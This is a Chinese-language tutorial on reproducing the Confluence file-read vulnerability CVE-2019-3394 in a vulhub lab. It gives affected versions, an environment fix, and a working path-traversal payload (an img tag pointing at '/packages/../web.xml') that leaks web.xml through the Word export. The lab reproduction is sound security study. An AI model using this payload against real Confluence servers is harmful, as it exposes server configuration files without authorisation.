溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn)

發(fā)布時(shí)間:2021-12-20 18:04:00 來源:億速云 閱讀:167 作者:柒染 欄目:大數(shù)據(jù)

Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn),針對(duì)這個(gè)問題,這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答,希望可以幫助更多想解決這個(gè)問題的小伙伴找到更簡(jiǎn)單易行的方法。

0x01 影響范圍

6.1.0 <= version < 6.6.16

6.7.0 <= version < 6.13.7

6.14.0 <= version < 6.15.8

0x02 環(huán)境搭建

溫馨提示:環(huán)境搭建要使用4G或以上運(yùn)存的虛擬機(jī)/VPS搭建

這里使用之前CVE-2019-3396的漏洞環(huán)境,按照鏈接中的步驟搭建即可

https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396

環(huán)境啟動(dòng)過程中出現(xiàn)了點(diǎn)小問題

Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn)

經(jīng)百度查找后得到解決方案:

# 進(jìn)入backports模塊路徑

cd /usr/local/lib/python2.7/dist-packages

# 復(fù)制整個(gè)包到transport包路徑下

cp -r backports /usr/local/lib/python2.7/dist-packages/docker/transport

0x03 漏洞利用

創(chuàng)建頁面填好信息后,確認(rèn)創(chuàng)建處抓包

Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn)

修改編輯文本的內(nèi)容如下:

<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>

Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn)

導(dǎo)出為word處抓包

Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn)

在返回包中即可看到web.xml文件內(nèi)容

Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn)

條件限制:此漏洞無法跳出web目錄去讀其他目錄的文件

關(guān)于Confluence 文件讀取漏洞CVE-2019-3394該如何復(fù)現(xiàn)問題的解答就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識(shí)。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI